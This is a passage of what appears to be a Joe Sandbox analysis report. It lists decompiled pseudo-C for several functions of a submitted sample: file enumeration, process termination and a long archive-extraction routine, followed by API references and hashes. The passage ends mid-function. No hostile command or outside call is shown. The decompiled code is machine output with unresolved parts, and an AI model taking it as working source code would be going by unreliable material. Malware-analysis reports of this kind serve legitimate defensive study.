				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E00BBE1C0();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E00BAFD96(_t83, _a4696, 0x800);
						_push(0x800);
						E00BABC3B(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00BB0D79(_t83 + 0x1010, _t81,  &_v4);
						E00BB0D79(_t83 + 0x1018, _t81,  &_v24);
						E00BB0D79(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E00BAB5AC(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t86 = FindFirstFileW( &_a592,  &_v0);
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}

0x00baa534
0x00baa539
0x00baa53e
0x00baa541
0x00baa54d
0x00baa554
0x00baa55c
0x00baa55f
0x00baa5d2
0x00baa5d8
0x00baa5da
0x00baa5dc
0x00baa5de
0x00baa5e4
0x00baa5e7
0x00baa5e7
0x00baa5ea
0x00baa5ea
0x00baa5f0
0x00baa5f2
0x00000000
0x00000000
0x00baa561
0x00baa568
0x00baa56e
0x00baa572
0x00baa5f8
0x00baa601
0x00baa606
0x00baa60d
0x00baa618
0x00baa618
0x00baa61c
0x00baa626
0x00baa629
0x00baa633
0x00baa63d
0x00baa647
0x00baa651
0x00baa65b
0x00baa665
0x00baa66f
0x00baa67c
0x00baa68c
0x00baa69c
0x00baa578
0x00baa58f
0x00baa5aa
0x00baa5aa
0x00baa5b3
0x00baa5c4
0x00baa5c4
0x00baa5bf
0x00baa5c1
0x00baa5c1
0x00baa5c6
0x00baa591
0x00baa5a4
0x00baa5a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00baa5a8
0x00baa58f
0x00baa572
0x00baa6a1
0x00baa6b4

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BAA42F,000000FF,?,?), ref: 00BAA568
FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BAA42F,000000FF,?,?), ref: 00BAA59E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BAA42F,000000FF,?,?), ref: 00BAA5AA
FindNextFileW.KERNEL32(?,?,?,?,?,?,00BAA42F,000000FF,?,?), ref: 00BAA5D2
GetLastError.KERNEL32(?,?,?,?,00BAA42F,000000FF,?,?), ref: 00BAA5DE

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 0e789df67991e9cfcd8af83eb342c5d1e2a5366365b0f1ceeae7bd480d68482e
Instruction ID: ead2480f27e564829f1182b9fb83377afdea00fda6f4e7dfd0ba08b00bbbca4d
Opcode Fuzzy Hash: 0e789df67991e9cfcd8af83eb342c5d1e2a5366365b0f1ceeae7bd480d68482e
Instruction Fuzzy Hash: 08417676508641AFC324EF68C884AEAF7E8FF59350F04096AF5A9D3240D774A954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7363 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00BC7363(int _a4) {
				void* _t14;
				void* _t16;

				if(E00BCA6B6(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00BC73E8(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00bc736f
0x00bc738b
0x00bc738b
0x00bc7394
0x00bc739d

APIs

GetCurrentProcess.KERNEL32(?,?,00BC7339,?,00BDAAB8,0000000C,00BC7490,?,00000002,00000000), ref: 00BC7384
TerminateProcess.KERNEL32(00000000,?,00BC7339,?,00BDAAB8,0000000C,00BC7490,?,00000002,00000000), ref: 00BC738B
ExitProcess.KERNEL32 ref: 00BC739D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e880c4e848a3c9b6bfd4d37ee6bb76a77247130b272dc3b6dfd1b28a6e127463
Instruction ID: fe7e85d059482739eef205f1b80fbd2595f58875e52bd084a16f607e7e2f0832
Opcode Fuzzy Hash: e880c4e848a3c9b6bfd4d37ee6bb76a77247130b272dc3b6dfd1b28a6e127463
Instruction Fuzzy Hash: 56E04635041288ABCF016F61DD19E887BA9EB90381B008068FD499B121DF35DC42EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8525 Relevance: 3.9, APIs: 2, Instructions: 945
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00BA8525(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t394;
				signed int _t395;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t410;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t434;
				char _t436;
				char _t438;
				signed int _t439;
				signed int _t440;
				signed int _t462;
				signed int _t471;
				intOrPtr _t474;
				char _t481;
				signed int _t482;
				void* _t493;
				void* _t501;
				void* _t503;
				signed int _t513;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t522;
				signed int _t525;
				signed int _t533;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed int _t549;
				signed char _t550;
				signed int _t553;
				void* _t558;
				signed int _t566;
				intOrPtr* _t577;
				intOrPtr _t579;
				signed int _t580;
				signed int _t590;
				intOrPtr _t593;
				signed int _t596;
				signed int _t605;
				signed int _t612;
				signed int _t614;
				signed int _t615;
				signed int _t617;
				signed int _t635;
				signed int _t636;
				void* _t643;
				void* _t644;
				signed int _t660;
				signed int _t671;
				intOrPtr _t672;
				void* _t674;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t685;
				intOrPtr _t687;
				signed int _t692;
				intOrPtr _t694;
				signed int _t697;
				signed int _t702;
				void* _t706;
				void* _t708;
				void* _t710;

				_t579 = __ecx;
				E00BBE0E4(E00BD1C8A, _t706);
				E00BBE1C0();
				_t577 =  *((intOrPtr*)(_t706 + 8));
				_t670 = 0;
				_t687 = _t579;
				 *((intOrPtr*)(_t706 - 0x20)) = _t687;
				_t371 =  *( *(_t687 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t371;
				if( *((intOrPtr*)(_t706 + 0xc)) != 0) {
					L6:
					_t694 =  *((intOrPtr*)(_t577 + 0x21dc));
					__eflags = _t694 - 2;
					if(_t694 == 2) {
						 *(_t687 + 0x10f5) = _t670;
						__eflags =  *(_t577 + 0x32dc) - _t670;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t577 + 0x32e4) - _t670;
							if(__eflags > 0) {
								L26:
								_t580 =  *(_t687 + 8);
								__eflags =  *((intOrPtr*)(_t580 + 0x615c)) - _t670;
								if( *((intOrPtr*)(_t580 + 0x615c)) != _t670) {
									L29:
									 *(_t706 - 0x13) = _t670;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x13; // 0x7ed
									_t375 = E00BA5E0A(_t577 + 0x2280, _t36, 6, _t670, _t35, 0x800);
									__eflags = _t375;
									_t376 = _t375 & 0xffffff00 | _t375 != 0x00000000;
									 *(_t706 - 0x12) = _t376;
									__eflags = _t376;
									if(_t376 != 0) {
										__eflags =  *(_t706 - 0x13);
										if( *(_t706 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t687 + 0xf1)) = 0;
										}
									}
									E00BA205D(_t577);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t577 + 0x22a8);
									E00BAB223();
									__eflags =  *((char*)(_t577 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t577 + 0x3373)) == 0) {
										_t381 = E00BA2147(_t577);
										__eflags = _t381;
										if(_t381 == 0) {
											_t550 =  *(_t687 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t550 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x12;
											 *_t61 =  *(_t706 - 0x12) &  !_t550;
											__eflags =  *_t61;
										}
									} else {
										_t553 =  *( *(_t687 + 8) + 0x72bc);
										__eflags = _t553 - 1;
										if(_t553 != 1) {
											__eflags =  *(_t706 - 0x13);
											if( *(_t706 - 0x13) == 0) {
												__eflags = _t553;
												 *(_t706 - 0x12) =  *(_t706 - 0x12) & (_t553 & 0xffffff00 | _t553 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t558 = E00BABB74(_t54);
												_t660 =  *(_t687 + 8);
												__eflags =  *((intOrPtr*)(_t660 + 0x72bc)) - 1 - _t558;
												if( *((intOrPtr*)(_t660 + 0x72bc)) - 1 != _t558) {
													 *(_t706 - 0x12) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E00BABB74(_t57);
												}
											}
										}
									}
									 *((char*)(_t687 + 0x5f)) =  *((intOrPtr*)(_t577 + 0x3319));
									 *((char*)(_t687 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0xbd2260( *((intOrPtr*)(_t577 + 0x6ca8)) -  *(_t577 + 0x32d8),  *((intOrPtr*)(_t577 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t577 + 0x10))();
									_t671 = 0;
									_t387 = 0;
									 *(_t706 - 0xe) = 0;
									 *(_t706 - 0x24) = 0;
									__eflags =  *(_t706 - 0x12);
									if( *(_t706 - 0x12) != 0) {
										L43:
										_t697 =  *(_t706 - 0x18);
										_t590 =  *((intOrPtr*)( *(_t687 + 8) + 0x61f9));
										_t389 = 0x49;
										__eflags = _t590;
										if(_t590 == 0) {
											L45:
											_t390 = _t671;
											L46:
											__eflags = _t590;
											_t83 = _t706 - 0x113c; // -2364
											_t394 = L00BB12D1(_t590, _t83, (_t390 & 0xffffff00 | _t590 == 0x00000000) & 0x000000ff, _t390,  *(_t706 - 0x24)); // executed
											__eflags = _t394;
											if(__eflags == 0) {
												L219:
												_t395 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t395;
											}
											_push(0x800);
											 *((intOrPtr*)(_t706 - 0x38)) = _t687 + 0x10f6;
											_t86 = _t706 - 0x113c; // -2364
											E00BA8214(__eflags, _t577, _t86, _t687 + 0x10f6);
											__eflags =  *(_t706 - 0xe);
											if( *(_t706 - 0xe) != 0) {
												L50:
												 *(_t706 - 0xd) = 0;
												L51:
												_t400 =  *(_t687 + 8);
												_t593 = 0x45;
												__eflags =  *((char*)(_t400 + 0x6153));
												_t672 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t593;
												 *((intOrPtr*)(_t706 - 0x30)) = _t672;
												if( *((char*)(_t400 + 0x6153)) != 0) {
													L53:
													__eflags = _t697 - _t593;
													if(_t697 == _t593) {
														L55:
														_t97 = _t706 - 0x31a8; // -10664
														E00BA7098(_t97);
														_push(0);
														_t98 = _t706 - 0x31a8; // -10664
														_t405 = E00BAA406(_t97, _t672, __eflags, _t687 + 0x10f6, _t98);
														__eflags = _t405;
														if(_t405 == 0) {
															_t406 =  *(_t687 + 8);
															__eflags =  *((char*)(_t406 + 0x6153));
															_t109 = _t706 - 0xd;
															 *_t109 =  *(_t706 - 0xd) & (_t406 & 0xffffff00 |  *((char*)(_t406 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t706 - 0x113c; // -2364
															_t410 = E00BA7D45(_t111, _t577, _t111);
															__eflags = _t410;
															if(_t410 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t577 + 0x331b));
																	if( *((char*)(_t577 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t706 - 0x113c; // -2364
																	_t543 = E00BA81E0(_t687, _t577);
																	__eflags = _t543;
																	if(_t543 == 0) {
																		 *((char*)(_t687 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t706 - 0x13c; // 0x6c4
																	_t700 =  *(_t687 + 8) + 0x5024;
																	_t596 = 0x40;
																	memcpy(_t118,  *(_t687 + 8) + 0x5024, _t596 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t121 = _t706 - 0x28; // 0x7d8
																	_t687 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t706 - 0x13c; // 0x6c4
																	E00BAC8D1(_t687 + 0x10, 0,  *((intOrPtr*)(_t577 + 0x331c)), _t128,  ~( *(_t577 + 0x3320) & 0x000000ff) & _t577 + 0x00003321, _t577 + 0x3331,  *((intOrPtr*)(_t577 + 0x336c)), _t577 + 0x334b, _t121);
																	__eflags =  *((char*)(_t577 + 0x331b));
																	if( *((char*)(_t577 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t147 = _t706 - 0x13c; // 0x6c4
																		L00BAE9F4(_t147);
																		_t148 = _t706 - 0x2160; // -6496
																		E00BA95B6(_t148);
																		_t420 =  *(_t577 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x2c) = _t420;
																		_t674 = 0x50;
																		__eflags = _t420;
																		if(_t420 == 0) {
																			L83:
																			_t421 = E00BA2147(_t577);
																			__eflags = _t421;
																			if(_t421 == 0) {
																				_t605 =  *(_t706 - 0xd);
																				__eflags = _t605;
																				if(_t605 == 0) {
																					_t700 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t577 + 0x6cb4));
																					if( *((char*)(_t577 + 0x6cb4)) == 0) {
																						__eflags = _t605;
																						if(_t605 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t359 = _t706 - 0x2160; // -6496
																							E00BA95E8(_t359, _t700);
																							__eflags =  *(_t706 - 0x12);
																							_t387 =  *(_t706 - 0xd);
																							_t675 =  *(_t706 - 0xe);
																							if( *(_t706 - 0x12) != 0) {
																								_t363 = _t687 + 0xec;
																								 *_t363 =  *(_t687 + 0xec) + 1;
																								__eflags =  *_t363;
																							}
																							L214:
																							__eflags =  *((char*)(_t687 + 0x60));
																							if( *((char*)(_t687 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t387;
																							if(_t387 != 0) {
																								L15:
																								_t395 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t577 + 0x6cb4)) - _t387;
																							if( *((intOrPtr*)(_t577 + 0x6cb4)) != _t387) {
																								__eflags = _t675;
																								if(_t675 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00BA1F0A(_t577);
																							goto L15;
																						}
																						L101:
																						_t424 =  *(_t687 + 8);
																						__eflags =  *((char*)(_t424 + 0x61f9));
																						if( *((char*)(_t424 + 0x61f9)) == 0) {
																							L103:
																							_t425 =  *(_t706 - 0xe);
																							__eflags = _t425;
																							if(_t425 != 0) {
																								L108:
																								 *((char*)(_t706 - 0x11)) = 1;
																								__eflags = _t425;
																								if(_t425 != 0) {
																									L110:
																									 *((intOrPtr*)(_t687 + 0xe8)) =  *((intOrPtr*)(_t687 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t687 + 0x80)) = 0;
																									 *((intOrPtr*)(_t687 + 0x84)) = 0;
																									 *((intOrPtr*)(_t687 + 0x88)) = 0;
																									 *((intOrPtr*)(_t687 + 0x8c)) = 0;
																									E00BAA9C8(_t687 + 0xc8, _t674,  *((intOrPtr*)(_t577 + 0x32f0)),  *((intOrPtr*)( *(_t687 + 8) + 0x82d8))); // executed
																									E00BAA9C8(_t687 + 0xa0, _t674,  *((intOrPtr*)(_t577 + 0x32f0)),  *((intOrPtr*)( *(_t687 + 8) + 0x82d8)));
																									_t700 = _t687 + 0x10;
																									 *(_t687 + 0x30) =  *(_t577 + 0x32d8);
																									_t218 = _t706 - 0x2160; // -6496
																									 *(_t687 + 0x34) =  *(_t577 + 0x32dc);
																									E00BAC919(_t700, _t577, _t218);
																									_t676 =  *((intOrPtr*)(_t706 - 0x11));
																									_t612 = 0;
																									_t434 =  *(_t706 - 0xe);
																									 *((char*)(_t687 + 0x39)) = _t676;
																									 *((char*)(_t687 + 0x3a)) = _t434;
																									 *(_t706 - 0x24) = 0;
																									 *(_t706 - 0x1c) = 0;
																									__eflags = _t676;
																									if(_t676 != 0) {
																										L127:
																										_t677 =  *(_t687 + 8);
																										__eflags =  *((char*)(_t677 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t677 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0x11));
																										if( *((char*)(_t706 - 0x11)) != 0) {
																											L131:
																											_t436 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x2c);
																											 *((char*)(_t706 - 0x10)) = _t612;
																											 *((char*)(_t706 - 0x14)) = _t436;
																											 *((char*)(_t706 - 0xf)) = _t436;
																											if( *(_t706 - 0x2c) == 0) {
																												__eflags =  *(_t577 + 0x3318);
																												if( *(_t577 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t577 + 0x22a0));
																													if(__eflags != 0) {
																														E00BB2BB2(_t577,  *((intOrPtr*)(_t687 + 0xe0)), _t706,  *((intOrPtr*)(_t577 + 0x3374)),  *(_t577 + 0x3370) & 0x000000ff);
																														_t474 =  *((intOrPtr*)(_t687 + 0xe0));
																														 *(_t474 + 0x4c48) =  *(_t577 + 0x32e0);
																														__eflags = 0;
																														 *(_t474 + 0x4c4c) =  *(_t577 + 0x32e4);
																														 *((char*)(_t474 + 0x4c60)) = 0;
																														E00BB2861( *((intOrPtr*)(_t687 + 0xe0)),  *((intOrPtr*)(_t577 + 0x229c)),  *(_t577 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t577 + 0x32e4));
																														_push( *(_t577 + 0x32e0));
																														_push(_t700); // executed
																														E00BA9283(_t577, _t677, _t687, __eflags); // executed
																													}
																												}
																												L163:
																												E00BA1F0A(_t577);
																												__eflags =  *((char*)(_t577 + 0x3319));
																												if( *((char*)(_t577 + 0x3319)) != 0) {
																													L166:
																													_t438 = 0;
																													__eflags = 0;
																													_t614 = 0;
																													L167:
																													__eflags =  *(_t577 + 0x3370);
																													if( *(_t577 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t577 + 0x22a0));
																														if( *((char*)(_t577 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 - 0xe);
																															 *((char*)(_t706 - 0x10)) = _t438;
																															if( *(_t706 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x2c);
																																_t678 =  *((intOrPtr*)(_t706 - 0xf));
																																if( *(_t706 - 0x2c) == 0) {
																																	L189:
																																	_t615 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0x11));
																																	if( *((char*)(_t706 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t700 =  *(_t706 - 0x18);
																																	__eflags = _t700 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t700 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x2c);
																																		if( *(_t706 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				L200:
																																				__eflags = _t615;
																																				if(_t615 != 0) {
																																					L208:
																																					_t439 =  *(_t687 + 8);
																																					__eflags =  *((char*)(_t439 + 0x61a0));
																																					if( *((char*)(_t439 + 0x61a0)) == 0) {
																																						_t700 = _t687 + 0x10f6;
																																						_t440 = E00BAA384(_t687 + 0x10f6,  *((intOrPtr*)(_t577 + 0x22a4))); // executed
																																						__eflags = _t440;
																																						if(__eflags == 0) {
																																							E00BA7032(__eflags, 0x11, _t577 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t687 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t679 =  *(_t706 - 0x1c);
																																				__eflags = _t679;
																																				_t617 =  *(_t706 - 0x24);
																																				if(_t679 > 0) {
																																					L203:
																																					__eflags = _t438;
																																					if(_t438 != 0) {
																																						L206:
																																						_t332 = _t706 - 0x2160; // -6496
																																						E00BA9DFF(_t332);
																																						L207:
																																						_t700 = _t577 + 0x32d0;
																																						_t692 = _t577 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t340 = _t706 - 0x2160; // -6496
																																						E00BA9CA2(_t340, _t577 + 0x32d0,  ~( *( *(_t687 + 8) + 0x72c8)) & _t692,  ~( *( *(_t687 + 8) + 0x72cc)) & _t577 + 0x000032c8,  ~( *( *(_t687 + 8) + 0x72d0)) & _t577 + 0x000032d0);
																																						_t341 = _t706 - 0x2160; // -6496
																																						E00BA9670(_t341);
																																						E00BA7BAA( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t577,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692;
																																						E00BA9C9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t577 + 0x000032d0);
																																						_t687 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t687 + 0x88)) - _t617;
																																					if( *((intOrPtr*)(_t687 + 0x88)) != _t617) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t687 + 0x8c)) - _t679;
																																					if( *((intOrPtr*)(_t687 + 0x8c)) == _t679) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t617;
																																				if(_t617 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t462 =  *(_t687 + 8);
																																			__eflags =  *((char*)(_t462 + 0x6198));
																																			if( *((char*)(_t462 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t438 =  *((intOrPtr*)(_t706 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t615;
																																		if(_t615 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t577 + 0x3380) - 5;
																																		if( *(_t577 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t678;
																																		if(_t678 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t700 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t700 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t577 + 0x3380) - 4;
																																if( *(_t577 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t678;
																																if(_t678 == 0) {
																																	goto L189;
																																}
																																_t615 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x14));
																															if( *((char*)(_t706 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t614;
																															if(_t614 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t577 + 0x331b)) - _t614;
																															if(__eflags == 0) {
																																L183:
																																_t312 = _t706 - 0x113c; // -2364
																																_push(_t577 + 0x1e);
																																_push(3);
																																L184:
																																E00BA7032(__eflags);
																																 *((char*)(_t706 - 0x10)) = 1;
																																E00BA6F5B(0xbdff50, 3);
																																_t438 =  *((intOrPtr*)(_t706 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t577 + 0x3341)) - _t614;
																															if( *((intOrPtr*)(_t577 + 0x3341)) == _t614) {
																																L181:
																																__eflags =  *((char*)(_t687 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t310 = _t706 - 0x113c; // -2364
																																_push(_t577 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t577 + 0x6cc4) - _t614;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t577 + 0x32e4) - _t438;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t614;
																															if(_t614 != 0) {
																																 *((char*)(_t687 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t577 + 0x32e0) - _t438;
																														if( *(_t577 + 0x32e0) <= _t438) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t687 + 0xf3)) = _t438;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t471 = E00BAA996(_t687 + 0xc8, _t687, _t577 + 0x32f0,  ~( *(_t577 + 0x334a) & 0x000000ff) & _t577 + 0x0000334b);
																												__eflags = _t471;
																												if(_t471 == 0) {
																													goto L166;
																												}
																												_t614 = 1;
																												_t438 = 0;
																												goto L167;
																											}
																											_t700 =  *(_t577 + 0x3380);
																											__eflags = _t700 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t706 - 0x41a8; // -14760
																												E00BA8214(__eflags, _t577, _t577 + 0x3384, _t263);
																												_t612 =  *((intOrPtr*)(_t706 - 0x10));
																												__eflags = _t612;
																												if(_t612 == 0) {
																													L153:
																													_t481 =  *((intOrPtr*)(_t706 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t577 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t577 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t612;
																														if(_t612 == 0) {
																															L157:
																															_t482 = 0;
